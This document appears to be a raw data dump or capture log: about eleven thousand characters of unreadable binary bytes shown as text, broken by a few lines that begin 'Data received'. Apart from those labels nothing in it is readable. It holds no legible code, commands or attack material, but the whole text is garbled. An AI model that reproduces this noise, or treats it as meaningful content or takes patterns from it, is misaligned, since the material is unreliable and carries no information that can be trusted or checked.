ª¾Ïœ,T|£6L6×2Zô“xêcö«I’à¡ñT˜‹ÅÝ&¿”È÷ÝRt9ì]ÙõgŒÉ õvjLì=Nådã+‰FšŸ ‹âÝÍï Έ<XÞE3æ1íZ©cL܂¹$¼£¿2ᵟ ÿ÷PSróôr¯—‘’€ï²ê‰Ðs`–Í|Ö½êm/«^QÅqJ¿»af“üG«2QÈsX`­wB·?ñF“uÊ"\j¯D·w ¦tMLi ò1uË©ÿ°ŒË‚¤"¹â΁(<OÍÔY4¤‘É {¼r€ÕPœ ‰»Íkk=]fC·l("A«†ÄdÁ¿wS«fJ¨Æ ¸h/BÎûϹ °£L}‰ä8~GñÂ>!º9Ãî÷7„®Vòþ¤ÿÜ7— ‘ÞYgΓƒQ;xS:VSqÚ(ªÜSªÏê³k‹¸C}l¡ï÷"l£êâ²ih²ÍÕåNÈ͏íyKê]îϋGÛG´®®2>H d‡Ù´Š‡¶¯T-ÑDþCWù‚ü¼¥åE3ò|ý,ä""ù ¦ mùŸ«ô\m}2M-mQî°ª ²óÿF‘”Lx†ßö†íaREF]ãS‚ZtÜ<.ãíSBë£-E÷Ü9®ÞŸÏ³öh¼Yû2‚OÐÞȤKjÕ DÁ³êK >z3Lh5ïêI¿ø{ϱl”Hö¤La-íå:¢þ§´Lo{lw(‰L‰”,Ëõ /ò0±éKº§“®õ­µpt)=/ºß)óÊ#4¬ÂªñO›×wéêWº½m59Ÿäz1|òZ투 ZÓdûÚßÔ̵£|Yé¶[ïv,×ÜPÅö0 ]b(!f”Z{$®%ï†×ûüqÂF«ÁĨnƖ…#-ºËHgº(È[{¾|>ž"/vi}„Ú=²Â&€.d/ø²¿soÖéØÑ ùXw›ÒN¯Ê«WߪQRo†l©ìåÙâŸbÉ7×}ÏÀYÕ-t›ÂݒwLó Î(sØ1 1—1g–&äÉ;ìám)óÖ\a>:„?“O«½ *]̕F–z±±}Ú·YkyýÇù,v oEØ.r‰aø+I€Æ *@×àG~™C܄øóxÊ¡a†õ;~(Ÿ Ï\狜i~E9¯Ç à‘gߕۀIAœ^e¾­èWœÂŠg“Âx(L\ÝUS~Òt¢þµü çŠC2ÊãaU•¿ƒÓígá}¦Ñ+µ]_ø„=÷ †ø[<="~‡¿¼U³ë êï˜è?Sön²ÔâÐ~ôˆ$þ;&2™ìàJb§½:Ç ƒ1퐥èeŸùÿËæɕ²^¾\wLöQÄé’ô5¹D+½ì=祬ïŸ3ÉÒCŸ? ]Þ®Á…D;¿iIÜ{«Ÿ 6gDa¤.úw nL˜¬‹[z%½“ZûXðÇ@‡á@„tˆ¿j“’{~–ï¦WbJ7øëwônýÒ=Q|'mˆFãòf…ɚ‚wj­+Š/‚O *¡êäß$.À=¸j5{]1½?…½“³ù‰…½ïø. »³ºàºZ\뼯sªl¿ŠïÃ×Í “Ã]9"ÄYxŠÙƒÚeöv\ydu3T’4·”›háa™•ßœ)Ô»ÝÃÔ;êRp™òæ¨{sûؽ°TÔGáoT¥ï•Ã½r|pçOmÌL,šGÞMƒoqC¾ÑVÁuÇÑ~ðˆšÌ]ÝV„tC#þQí9¸°õªõ¾§ðú´5)a*#õ`§ ìȨ!ÒìùQ£q£Ì3`¸ª 1†‡’1³5´–ÂqÉB·ß8Ó¦Dp!³ËK»JrJ³ð5[üÒ×~è†LJ¢‘Td~¨/Û*’&v´F.HDڂÌuÜ$ç9YÌúªÌµÆ .~dÑLlځÐ7ڍž2+®ŸBªzÒþfº«þ™°h½r¿ÿØíöcýáMhӐÉr@àE­§HÛg-»bÓ3ZP¯š‚Á鶉{Y¹[>•‚wÓ§:wÏÞÕòD‘#d «ÉO¨O>ûÂJ¹×å‹ß­‹T]6þìˆŠÆ Ø?šò2_;úÏ´ú”6ÒÅ;+ Ìë„عÆ;º~3!v•k¬öÏeª"CaÄü¿É¶0‰^<š(«"¾ÐÑm °,À¤Èd¦yëêÁ^RSeBº@rªYÝçi Cþ‘¦AÀ»€ø®íåÏ`¡/ª&¾§xV÷y¸ó†Ka’¨jӗ8V3Vãzóßè¹àPJY€u­µ;ƒ€©¯§E«#A¢ÈvYÁ­Û&»ž ™õ[.Qµ)Ýtϒ­2KˇñJ1Æ%Qó9–àÃ5ŠbÛ5m¿í+ª‹œ±üT1 ÕM»íš,¯‰Ñ&#Œ¿Úšã¯x&IðT\8~pXJ‘½ˆ¤ITLŽRiµ(ìŸymœžlÃh®x‘”[MIaêOéºeûኼÀYÝ#µ5(Ù Šúw"¨†[{¿ô¼™3ms&j“NaIdþYS#$€@C(/ V¿„€>–ïµ°)*Õ$iÖ _ê—eìîOØ3’hk¨ãí…Q l‰<ã,W6œõN3…©š+Š1©$šaٜÕÝ YÈ zR5¨·"qb»¹u§‡õÑe'‡ëß±êYgiÖY&%.¯ÊòË0Ìí«n-3°“Kz“ŒÛSx×í?>‹dŸkQ/R…Ôkòmxˆ2ÜF¢þvÿçցÍ:Y# ¿hõ]Ä­à‡<¬Z¢ã-Ý·¦ïˆªàX3 ¦vrಊ_ÞagÊlç²Ãw[‰ˆäg6^Gú2`·¾‡¦! ż|£ëÁ+†aɺ3—Õð7ˆOI6Ý[ËOŸ_°ìjHø©î“¯ƒ
Data received ¡€í¤Öv%|šÌíÖ³°›. sS¢Žâś—¡`r1†ç¡/ž3jr¤ ˜@=úUjí`ã³+l=“ߨ÷ޞdt/©àDá°´ÿBø±´¤¢±6ð=#Pâ}þ›çˆ.>;.$QԏFKà}L$à>UYCqÑNÏì´õÏS®Î"d`󿗊,ióÑòÔԊHUµŠÝ¤­³˜«R¥dC¼óºe¯hâ®*«ÿ®"¢œé(ĺXq¯Fº•7—”@°°Ú‹tãAr.d>É`UALê£<1±Å€[À\i»I ;¼Ín±Öåç9‚Å™¤ý6ᲑqY×Ê÷¡9#Í\‹Øgéæ ˜·x¦ÈTÚߏÔ^Ì2Ÿ`’¼C–5šä,0ÀðĪ)Qž+«dðz 䝀^Ùld…jÄ­«^¨†D„¦ô™Ø¾$âvl²WKÑ¡kQG¯÷,§c·>Ð ±b2ÆèÎp“¤x{É4B… n³CP¤`™zd&/Þ;m$ÐáÙ¦üoû†Q0¯œŒ¿Ž S¯äçX&ÌVdƒ$Ë~.Èàς!×d<rnKŸì ¬pŒÞY²[«ªìšŽ¾÷=¼ÙZò'ÿŠþ†Zš¸wÌÀŠN~Aü#ú‡íˆÁ"âWúžD¿½Î49Æ9«¿ËÐ.„B ¬qAŽnTÜñПäF%ÀÕÊü_Ή(N» ïê«úM:ÉÒ‹ÇYN!ͪZº»v³ÇKü…x÷ær‹Â!|‹Ùôvÿýv÷4r©FôÁx)„Ù¯÷ÿ JìüZð› /4¢S$þ`…Öû5™T»ÑßdFÆ`dY,@ídœ¡æ¼F•óû2…©R ÇÛÛ¨ ,Öc¥DVŸÖÿQ ¢O4\/äñ®þ-“‡ÅÝÕ[ùëýúE%íè±q¥gŒËòPÑÞ9í=ùÁúëq±˜†¢lDça`€UÞXÉFJîØs„i;!¯1&qY¹ØRNŽüžëåÄ÷n”'pçŽd䮨3D:5%´ujïZîŏ·2íÆÞݵ½TrjAèýëë‡3f9,>Nð kahק~çbàê—ÛšaB‰tÏÇ(©Îq”ŒöËӋØèDH-n&æ¾õcúŠÃéhœAŒCò{Äô/°ÿúë:ˆ¶Uìڎ€ÇªÉiŽ>Âzž¸-¡Šb«IÐxDفê4ƒÝöàLdy“783ÿd±,£¡*à ¯lë“ÞCçnܒÏHu=4ùpbk¦½¤¹ÚÄÔn•­q‹2 Ô@;¿Õ›TÀƒ3Ö0î<"'»ˆŠØ” {Q‡}nÔh%œ×fˋ³]c¯M¦û&?ÝB¼°/鲦±f÷©Rþ×°ß ~gb9ÁÔÃ2ݛvGŽß÷¸³Y:ìÑâ"6Á¨}ï¿Éy›kñ[éo¸dA•ò¸=×ÂçÑx‰×I ´q$f: |¿¾¼²†*åÊ#ÙNiGA©–,ð{ü¬ä¨ÿ臌¹­Ð¬ù’]Yƒ.ľ\r,!.—ÓQ”t…ôîDS\”N#”p6e‘F‰ CÝò>×.?ë0b3џ­ùêÖ?ôs&Žóç¸E¨¹­Lmµ«vªIƒgÃåSӇÎ&Rðë+Ü5Óü¯åß»MI©Þ öðiyþm·Io¦‘÷kQoA;ÀŽ©exm&êÊ3ìüšç…ˆÈ®Úî£DºAô^Õў…O47©ûÙ½T’YUÎýJUD0Ѧ¬ ›œ¡Îqöj ¬çWšÚÙ¸."i¶6¶@~`Âü,e̓pßA`-~€ûIœ+˜‚€)£Øq¥õJgüU„œ ?5æñµË΍`®O :Žq ì®r]>`UÌS–¯ÿ½ªfÝtõ§ƒH $ŸZÕ!Œ™]ˆAÔî±M¹ÎBÓÇá&Àٕ‹ÇÀ“?ëÁ‡iÍ 2Á¦Ö­ó¨‚*ò‚%Ý ”4p-¯ýÖ^sþS‘ü%ë¿x¨.õa©w2øe@Þq_x•¶Ÿmµ*–ˆ0Ô 0bYk.ƒkùb1=:¸í ³©ÌÙ:õ" Eu‚å«Å 'swð€¶á7+pÁŒR¯Uz–Ôcã¨_Ï´æIT{uFÔêTÁìÁZE§¥……´¹ÉYrKtá±ÆáÃ7QvK€mÌh›âìvm*Ý,šÒ!"oÑÅcdäԆ!HŠŸÚoS،´TäÙD·JÒ§{áªU”ý¿0ëŸulDXzî³w4­Àòëö°e‚*Ï¢®ë¦Îž†­{ùý1³3ȎºÊ>Š×««ÙSÔz˜N+gó^0@×Lû^ÉmS[X-˜‡‹4‡¨Î»”ëžà„¶,6œû$â~¦½¶ú™@…ÀŽ«Ÿ`ûsÕÂR…Zí{Kˆ¡D'Üñ ïÿúh ß ª’bB*WMd^õ À%a¹¦Í‹RÂ,{×.敞’Ï2E·V€èt±ª­Û"7V»FäI@ˆÀR#fø!#Úß(Ža[š’pW è'/"Ù Í©¦gï4LB5!·‚¤CÄ?Pð·²gÜNT;5zC Œ¤µfB3«,-¦1a/5^l)üwÒ(ÊÒÄ[7͕½rIÜؗ¹©ê$,€“+Êàžµ˜G}Ù[!+ày¾ ÄÉw?é<…£ ×—B/¿ÿU3^ž>-,¬!T^ãr½ý‹-rÆ*À\ÉÍåU8xcG^|+ºæ± ,Å$×L‹u3¹[þmnij€ÃÆÛÈ«[Ñõò«ùs 0œj®íS…÷—[:뽤—LíS Þ Ëgó¤«EÃÅc”Nãáò À•<StY¨•IútÓp=ã—zN¦Ü —m€ùÖry¨‡«£˜åà™c§EYOýOÌdmëu‰’ëÝò/yM|6ù>7ôt_jÓ\ïï듾7s^JºëÇ<ñz6GÔEnì„Îä§ñ{Û4tywª4ü˜W±ÿ ø=’¥"8„–Ž;,†Îðg˜†<¦ñþÄZIJ{OeÙâ`ÿD¢ç‡¤€ßˌÃ6§>}m&M斛T™³¾O6Ú<ɌϦ†•ƒ‰o[ǹ=(˙.ûÙËmšíöÝÛ\°XZxÇo¿+[çI:¾9òÙò×YZ-À‹ÛÉ ­ÛþøÖÿ xù´´v0°ò'H¯“Üõ¸j›°/®·¢ÇÐi¨aù·Xö±ÊFœiêò÷XF¬®¾AA”Oÿ "‘G®¤Ižús>k«ÁŠH>é¬>|ƒˆ=­ë"TsÚÖ. Z¼;¸–‚Ó7ä…³çã[§ԅá±/õ±:Ό=€"÷ÔþIœq+'-¡ z{Ì1Ô!8hLXÔ[CR¶m×$¸5™Ÿ²]Üb‡vÔVVG =Óü†/ßýTñn)zTБÕ||ʳœ×&6îRkžÐÛýRªPPÛ¥®×ž©0"Úÿ’”†2Že"z°R©Ñ=mÙòd}`$>’GˆËª}ªºGÉøϜéñ*µ‘}ÔÊ·çÑ)E›6>s “x ënXb‘‚[ðŽ-*}Pù>؁™?k!ùŒ¾Tàº]…;\LÚ7ŠõŠºÓ§Z¹ÇԎéÝZi€-Ó5°Ïe¯"@{50GºCÉÕ#lŠ¸Ñ®ˆ` ú ùùm¦P?LQ®s”÷>Özy×Ã$kE‡ÑÂÞo8·‹P-†bl/ÆT=®Ìµ>$&Ä{Œ6nþ3p…®c`ë_‡ôlï“Q!ÇÛ%ÀKǼ‰ãRȎ¶žâ(rü<"ZÜ83ìÀíÑ
Data received 5Ȋokµ^a‘–FTµc ö'ÒڏGÉX_‚Š;A‹à‹™Ó·jÞ±«‹å(fer>z.¿5»––S.b¥ÃE•Õ‹»º²ÇúD4^2™Ÿ²¦¶C)³}ÚOÙï|¯ 6’#ØQ>µÜWҖKg:–Kifó¡0ꔀX>{ƒ¿«[×о˜"Ƒ*°YoœS €ìè<ƒ°×|8ƒoá<†ã‚{§×0Hº´¬'‘¨-¶fuCÖQș2…_ž¿±g“íÅ ;sÐ[;#ƒ_M‡D(ïû¡Œ·–3!ëðzéðS›S}ŠºÏn¥0’ïîT¡0¤Ô(#[—Ïìoµ êòAØ­®ÑâÉÂ%c Þ9§ê:»§¢ÄÁY€ì„ôñ)׉EÒ~q>Pô(¹v0±¬ˆv]z»”±[㧰cí-P|ón÷di°…_6¤pÖ/ô¯åîÝ´§t*éŒÏxùß~E•ÿ»S[»¶/Á£¶ìõŠLVºÀ/ÉÈ»0ÜÉ÷?’QØ z4‘»JfO/ŠœtÑHAFªý&Viš¤5í!¾3z16úê ^ %£¿Ø–egÑ 8Œ“æH\¼™Â8 ˆ¦äQÖºL½Øòº$Ž¢¶õ݈SÎÉo¡Inó$ï•*ëÚĶ΃Àõ"…œÒ3(¬M?Ø ¶„1Ý7ê£SU¼qQœÊJmÛÛx3bå9‡CÌ=9ô•ÀŠ¹AÞ»Y©6x¶3Q”h×a·žþžÙt.b7ð'¥áÇra§¤Ž µŽ¤qm|L„Ò!Ë«<Eèw0nÏÜÛd3ó÷ï”x:I(|!a‡%ëN)`p$°™Þƒ²§Ù¹;Ñ@†<Ía†/=£ë•ÔZºØ5B,—ÏÌP[艓tG¨¦È¤ÂqÈ)ƾ»/=ÖAÔ³Ž¯-áԉµÖgHjª‚Š¦â¨‘úãñ0–l¯1L^Ïé)«׋îtáһÓôô‚Q¨NìQ¤ûÛñߚ©»Ñ³¼®¿†±ï‹†ª«e½@ªE •'qþ؈ ìh´*›†·ƒÝ૆n+qù ¹¸œp>Nßu<6m7îˆXÇћólT»“x ¦¥-*îyøÙjK–¤l“ ž›ƒ9ûm©·™:»|ì–{a0U‹¤ ž©ôû—yÅ4¨ß¬jùþÀ†K‰áƈh{„²fˆY‡xù¢³ÉÈu)ïÎJí¨¢– ©<O³)mU_3 öÌó§7~lÕãÁ}·é {C¥Tø›¤ŽªTÛ®À,öâ=ŠÜÎ?yó ·[~œfc†[ rÐ8Œäú4k%Ø(‹°áý1<A²ƒõ^Êõ£T_ÿ¿— ó"Ã7'G7ä¶+øòƾ#ÖÖ¾˜ItدO·×Jâûè¸Ù.NªRG —­<^b¬wŒ¤o-Kւ"e\ÍÚï£FĹ4²Î4†°'‡Öµ~œH(¬ÌŸž4ܨ/€RF¯6–‚@°`ÃV_“H\˜ÝËD† Š»±¿@/v‘éÙsñ-Ö;3꒾ !6¬¯—é`H1°…Z½-©ƒüvƒG‚¾Ì$9ó³Ñ¿¯!\[­ÃÕÚmdÈáD¹ê÷]Ðͧ÷`7´´27?ªBí[Óúp ˜ÚÏ!iUi³‚JUŠsM Výð…\r‚iy#q®÷qU¾>þ6Ñ«…÷'"Õå±v‘|醵‹'_àå÷X›“ÿ8çåèâö#)dsþ«ÎøÓh”-†þ€(¢3 ҙ¡[úþÆßw£ I¨{Ø)Ÿ­YWB)ÐÎc‰¨°ñÒR N3-È?m"ñNzTÌ8íãæîñÄñÎSFN¸h_+$ŠœÅÀÑuÈX¶‡ÝØ“ýt±ÏÐ`2Zr!¥Ý S±§››L‡8½éCº÷ e‹ãÞMü&TSëC÷±{êì.&Ac'^BXü÷ýTMܨifþ\†åv´!ÑØ%‰EÐô^MdÔ:^: ñ³ãz%¦Ë.B&••%WŸŒS6&¾ÆÀ¤k֓YÍ0€žÆ®àSÖ¯PR q¾3ÓoT¬Ák ߘդh·GÚl;»m1Cò#@Œê­÷@1½ä(ÁR¹§ŒÐëÿ%¦_(ڙ¹Ø¼™uuX€Åµ›õ!ÖñdÆrËYëßߊC7±‘YÞRqÇÈç–8m-”Q2ÊÜpê¨us;`£,¾L­ßž<ˆpÎJ€È ˕ ñ ÃÚ8ô~Lœ[‡úb› ÿJ®Ióµ#æ.êø/p‹`¡)òš*-¿1šÌ;Ψif½½`*ŽÌñmÎqà®WEß}Â.̓ƒxz ë×z.™$PãÂ\¯G¯,†Æ|%íCø¥’i¡Ç@y ÅRÉÔáGý› Ì^ K^_–[†ÃŽF“dì%ydãŽÐW“@æ`{ÈZЫÊòÑ< Âï–ö„áBÞË¥óf„ÿŠ(äV ¦%Ù>Ñá°¤¸Â$C@AÑ%çn±Ü7ÿU ÆOef-´5M•(ê%ZŠê–]®}ø^2,þ$ƒšÖž×|k˜VÜ 0‰1Μ±yÝޒšÄ8 NĮƙÕH@õӔ´ê©]hÄ+»Ð|­MÅesÕt$ŧB> 2¢{§õ78K0Ê".Ä¿Ó`aCXAUäë.¬iê´DÎiOc¼S’ªÁdᐮ“îo»†œª¼À«£žs\ZÇ×fpÏÛ{=Ý A¬ ð»¢%žõ…ižq¼&ÊËxZc†4°›µw’b’ý£‰5gä7/R”:F‚~§aìdaüì íPE«°MŠ;ÚóÛÓÜ1(„Ø˄eë¨ö»öìV÷Ê苠H¬©  65õ4RDheQR™)êý®'¯ßØ]rN“çTŽj×ò^ÔU,ƒœåz†Òóc±GA ýZ‚ߍG¥,ã5¢û\s2﷝–u'ø7‰ŸÁ!l$˜†M!¶4×^QYÝú¯ÎS‚§7E‡£ø«”*t -àÖAñÑl?Òýk“ÙK{F-ø„ׄþP#è•âé…ÿ¡?“V‰'R[TÄ#Ÿ‡¢`R/WFêg ÔB¦C3©ÏcjL%N²ÜÂÛctÁü9Z•Z<h/Ý=*lcrb#ÚNç’òu;Z÷8ð¢,áûPƒZۜOw¯í p9’ ½’}Hèjå:(ª®q͗ýz(zGüc➠äØn,½ô7=:ì"p£#j âäQ: *š\!²µ§zXÁÄÆC²KéôÃ÷¢k•ï†¯q퍏Ú]ƒ¶6`gbóðd‚Ýýuwr`<è !Ù|kÍX­Á±\#/zÉ3`öBý<;MøÞw¨G0MÕ¤¸šÉb¬y{²o«jIoÙ!> ±4ç#›ïq¨)H´°z/Òî¡6©Š*}3Á¦UmNû`åøÌ *&ÖvYB-æÓ^Îå*sµ@;3’m?áeĤ¯ê’ô'ð#üƒP¹DFZ¦‹B/ÐJÚ²†–½ ‘y{){i)Ú Õ­±»Ë/.ûæ„B(ÚHxÕèʅdò2çápüà{ø>`¨:íddôíd'¾Û*Úç µÑºágÃ;±®æô¿³»ºsDÆíà¦òAXúz˜ï÷gR—µR­¬O®œk4#ùº6x™d;:V)ޝ­“ð °¿ç]¾à<ó^2ƒؒŽ­¢òêڐ°?°ûŸSÉ̇utF³ˆ„ óðï„*f?õ,•(']ÒWM/MQÐ[)ØMµCàĘé†;óFâ0øP—l ¸;>G\ŠRi¦¨
Data received J@w‚ôjn „U¬Ã]iŒLÞFáÁôÏOê½g®O­…1:øL°Œ]K -À9kˍÆ[Ïi.\Ä{²ÈñwY¤½Ú·áºCwÝÌ^¶à7)œãì]VÂ/9wnLúÈ, 4BEåôÉÙ¸6õ©G>²à«3ò:zR1:áL˜.+Žç ÊhmNL\*f-Jp[æ;&vlþVRÁ> ‰O½Á¸Yôœ;ù!²ÚRè{DLáŒÏá&qi~´>4rù¿Ã6íJ¾ ¼q³®¹@²W/×Ièµh €ò|k6dÉ®ß yÍþ;ˆ'p¿ ÷ç¾â5%®Y'tÒ'4ðÁ{â˜Y0ܼŒGÖöÒB¶zs~@3ú ¦ì&š9S “JácîLP7q¨mŦ <¢E¢kïÑp ÅU¸ÅZÚZ¾0?·ñèX93‰—¾­“[KÖsG畼úTðØÎ#öÐƜõpùªZ3¶–’énªšVßÂ.EØ:Æc|KÏŸVWêߟòŽ)ú–Nóh§––‡ÞL *ãÛ†¾PëìÖóXb€­[³ú©<¹:Þ/`‹†3ÅîÓ žAt0«åË®cR¦ðžëäÅhǨåø¼hüq‚ØÓüF,|ÁJãk´ìP/ÍÞtÕÉpâ`Óª¤JӍÚtV@ÆL 3é?! \%Ë[+ã€ER%‘‘õ¿â0ñ¶”çé+Tk0đ)ö8kRâÅyóŒo*öí¦Ñ`Klƒ~ ÅC‘–7¸Kú짛ýÌ- ‘û1Ìð.SWú¾¬*¸laÿuƒø´l…‘íµ€lÉXù3Ó={`Tù¡á­x÷⪄gœÃàâ:ͬ½CÄì|ù ÈóÐ+ X5±Á-›ÖÏ«UÑҍ½ûùðd¬á‰ì3ï¹ûKXŽAYó;@J*ë`£¹ó1,0oÕ«‘l´? !éMJɍ6.m~ OXºšÏ]!.ùªÒ§6¯o{.”<r,V›,œJãàiÕOèÊÄ'?|IƒúÙ¥×£‹<–£:pÅíï -ü?P?l£N鄖!]¢ôT¼É4ÔFØ1žs.ȹÞRåQ>÷pyW <¨þ `À÷=:ëµñœ†´òþÓun4ɔÖïhYÀdÖ¶o/)Ú7Dï{0‹)´`·^”97eLå–ÐíMÙ ´–´I‘#ߦH€ÁnÓ <ü©¾O˜õZ¨×Õö?ÚòÂÈR¨TK¯ˆÅ҅H7åÕPe–*•çг*a Œ#n7ö},¦-UÂÓ]ÛŽwŠ_£D ” óOÀÆÜÁfc>$X&²€¶Õ|˜ÉPßÄ?F/ô&¥ EShk“¹tD–^]‘@˜Y.©(P…d&¥棨úՍ;m‹ßçÀ+±È݇:¸Í~µ°w¤#4|ªÝð>6ñÒ},ÕúêlŒ,çèÄN8yÙÖÔ ä´r»å3­•ÞøzSåøSÐü4ÆÖï#ߙ[Hô ó[°Ünê¼FÑä­)š³þÖÚ/ ùïÀ *f× è×ßõ«oø~æ7ZCãœÚVÄõ–¿^è¤m”Ÿ5!uîb{ºðj]”f8äT¶ËW™é·Ð¬1d/í'ËTã%êº%16gÚ\íÉÿ|¶ë&mcȎM|¸ÑLJF†zÒ ˆhªÜÖä!dj’­‹OXQxãtZȓ’·÷5¹”â¿:ºJ ÑP°©~³÷±¾ÜÒ<ƒ.V}ógMxYô>sØ àftEÊ Û‰ÀS\s&Jݜ‚U8Q»*kþ­²ç! Fžì4÷”¹bÞ ¹£¬<hr û±ÌáŽÝjj×ìF!­e5oMÂÃ/v¨I¸Éáàµý><¨[ú¸¤Â1Eʶ¡Yiâ}‡È<Ï:ñ×pðHÁ¥Û¥6yÁ‚ø´¿šÛ…ûÏ ‰ †”’ä°ÙÎùkKæ$_l½ÅÉô’õ΢"tÙË)GZ7ñ{ÅüØø\ÏgeÌèãƒÖ՟Æný=?àvø×½+!¨örµ Jîh´Zmèì`+/#[¶´vÉah2ž­LꝳÞvü"D¢Íã(ñD/ËsMÁ] /ðìŒCÅ~‡¡¢L茶MwihÌ] “snðÉÓ\%vCò¼îH¿FE.sÛÍR?Ûh_ñê±Ð)"¥4_^]‹m•Õø9è–cƒk³à2~ òrô½[íá9?Œ©>ƒŽ—ÝŹõ×eé3W;`é½y˾Ró£ ³v6üÆjÆð×Vã $‡· çlug³ƒ6¯ÙÁdL¤ÿWN¶]ÈÛC†éEŒ^šx˜åâÄÞ9[¹€a¸íñ/‡ÖJ„˜©NØÿû_­¸¯{)áÙ0Á £@ ä—e“,³|dÒu¥hØ8›³n`‘ÂôÞ©š•s†;:À1y9°Ð÷õÊb‚éáèAÔÔ¦¯;.ó( x>•·´¤) „¢Ëöµ¢«*Ü1­»p£€]õ<ê1 ¿kʸNù(…uû(ËR0 ¥GC.æðôTe¢5Åۆá—× •ñ‰+|<òšn¦tHÅf¨¦–3Úó%ú†Zû' ÝÎþñ‚•´Â&n_|âãJjE8-"Îùûg¨Õ-pŒ?§#+Ĕ"líµfVCÌüv뀺œOê9ã`ƒÅM¨0Yy%òµà°MÈlqR&•™Ð<êG}1:7!u5v ?c¼jg”´€J¤È²Ù·jHGu¬ð(=¡UÉ<÷¾õñ‰$YéaÆÛ(3ÝëZ‘i¶Ò~œHhp5+YŸšÖKFÖ³‘bÃ[ó=ÖëÀ¬±ÈÈô/×C””änjoLËØÈ¥_éÂʱQ,ÍñU~˜xQ(qì—Qš®šãOçRf(¥œç˜, Ó!>´p8Rwõ·ê”'ïêŒ 2µ˜¨Øf?i‡©D„êŠÉF}ã0ѢҖϐk£jó5Q’ø_Ãð¥HxF|÷58ZÑÃNih9·ÃRé8Xhݛ ò’Ñ\ŒDˆ_¹.Ћ)62'ÒÑg÷º9ÌVÉH4JNÈÎ (ñkÎÂáx Øùüy†«T\6ÞÀa´ßؼ$åêëPÌÒtÜö. ƒR8Œ+ìÆ®#B>'×½ ðo e˜½u–K$܆æéµÖU£°Œà3÷}_*´„ŸwÝúãºAZí-¦à…¨D§¾ øÍ8Ë[­pk=kÂH‹'T>–lá|ñ0+¡6W8ݙwT$¿J±>؆Æá'ÇÕi«:fÒu€V§Þ—tölFÞâ|Yå)fî÷Æ^Ÿ<Ö ¡`iÔZf"ÎÆ­þé(ArsûÒòY#$FÆ<N cëÝ| økŽ-’5–iÎþQ3fßO›¬@Î E ؑ’‡Ûøª%¶¥RštÍVäHÚÌúèž2«~ø >߄¨M&*]o÷¹Ïó¤ÉË%CB/"Çh#Â8¬¬qW-b£,ީ㸜|nòa2ê íÿÄÐÎRË>ˆu« m¦'SY1$þ »ë2¹3ïkUU`q¤)™Y4sGŒ:BjÒÄÖ­-©K¹ ËSd9l.$©nê ¯%éûɜIÿbn§¦€2…Žf¨*t:Ó0k7êÐÌ5oœŸWcòÆU[9õ2íµ~ýû¬yšÚ"’tqšŒô§™½ìMõ¿A]:3K©B ‚oúú†OÆB½E†U¯ðï|ß&¯¡–ØÈ¿¤Ü×>ûÊ%ÖKf
Data received e™ÚD¤% {|ïKÂA—÷±§GÕå÷Az_É7m$Z5ícP ‡žSf7)ϙpÔ <º&þ‰Ý4ÙRÉ7–x© øQôsˆ}ýŸg‚´†Øïp‡Õñ„Ýg„Ík¦“/R~Xz vC|9xql~Ôþù9`F}1ŽÐñäïÛ]aä_ ª…÷JÓ­Ú'¢¤{3ŸÝ§-9KÛJ+aÙ¸–É|~M»”¿ç5­ÜDC¥á/7)‚ò|nÀf¾tÅÇ|s‡¬¦7· )yªÂSáÙñpÇ~‘­¹2+én !n[Ê¥] 𶢳íM:KHz<Œû]›!wJs‡ÿû„¶|©JLpCbÏ»’[ô­ÕúpÙKÑeˆ`[(OÑ%7·ª^w¥ËQ8ñÍ:ۍìþ”3*g+äe ûÑ.7ÕÚ&Ì;›¶ýá’Á­`?f·IÀòÎê¾þš±ŒÙ¦&L#!àâžâZh"êå阻!Ñ8¦¥øGìŠF(~œoÿ#1 ˆ­ïź™ûgË ÒÅE/å‰ÜCêYd€ \ûmbL‰BØðÇìÝ‹ ¸¡¢háҚ”øqW ×¾tOAÈÜ/ÊP¨…uÕrÌ%år󶮠ºÐù§mCµ°T~Û²¤§áh?Uéf50|‹‚+V½ Á·Ù9_³„϶›ÐlÝ÷³Ž\S?Ô°::ݱwì£ÜK— Õí…òæé?ˆTàBè1¢Ñ‚1e¶˜Z~¸‡½ÃÅúù‘@0m;Y½ÂQri©U»ºÛ6ÈêCJ«N KèÐ>¡^+8WŠØÎ""#®M‘½ (é6n\¿±vB7h¨Ðu4ŒúH¶­šúA3áºÏ߆Õd—(&Ѓ(0S#&íŠ6¥\©—îƽ¤…»ÿnÊ3.»¡6’ýbHáӑÉõ^ˆéúšÂœ”VFNd¦L®ÀŽBnðÕ*>,ޝ(ÍÁøu՜à¡huÈ<‡‰Å¶^•Ü{JG÷ùñ;‡k'ø=(bf¡€ºä"éòú”Ø0Ÿá2.ƒ~À9쫬r­†ãš7È ”’*¿^š4–§¬@; 2¼ÐŜèMw‰J8*چق6¡†ç= ítâ^¢œ›3͵P´­,¶™Ž.laŠàa=‚9f2¤1JWv2üP6ù'âیÞí ¤¬ñ¾Ró${d&/1)ؙ«·ã±ÀG3 ‡+?ö?‚t†iõn¸fƝ‘A@wµlKOGŽªSá9ÃÖ$òfœ•¥Zè‘?è¶æ0¨¸n –¡ú{›[ ·­_œZX t‚© n†ªÖ­‡¦AÇäT͓á~„õL­›O ¤Þ[o&Þ ‚ï‘Ó|˜Š–»gŒ›´ÎòÍÊċE°Û:Ïë!H× ‘²P¾IÉÔ×Ý(²ºÄ|6öìZ“sÓ³ü`9½heÈf¯yŠXÁsç tˆºúq´e?ÈöPêSU•ýfw‹CÑD»¦`õëg³‹Íbirö¼"ïæL4œˆ¿öúÏ*‡ôTãÒØ5j %~Vc³BÀOJ7 Nà—^nYNó!õj]©„bà;6ÇÚ.iXØ£ѧkg|Ó/YRãmO²úW¹f>¯Jk΍ƒÇ¶·F†giÝéFO~–nKK²@ ½©^^L Ée+1ÿÙ-]¦ŠX¨¸±Âg©¨% œG1ï ~ýý6Þ'HÃú¦9Ž—E¤46½‡>£.3ä.x†ƒi;…ÓƒâÞß~Uè¯wÜoÄãÌÁêA1KK¾H…míÑí–uÔv.§‰…çtT>o™B6ËdqŠ;R³dÛ¹Sý§½à»ÖÚÉb¤6ÑXåx9»=³¾¾p}i,üÞg–F™oj¡2nJÊ>äâ¦fâLÌþGp‡&ÓlA3NF‚SJ:gk4Wxõk¨‡yÁCVk_1WÎ3þµï Š|šzÌÎÚr߯ŸRqæLÔ¥èwÖè=J@VQ;ÿɾŸÚgœcµ©š]Cýç|2.å6R?ƒñ;ù2tÓîHŠ»vÚ/±’z4sU} 8ÕIÑ(êᅰàëLªTÒWíµ‹ º°Â¥ãä)?ÛönâÇê)-cfÃ8zu°ã6Éwԉ¢LCªq¨OñúÕ£—8Ü ÷Ðñ 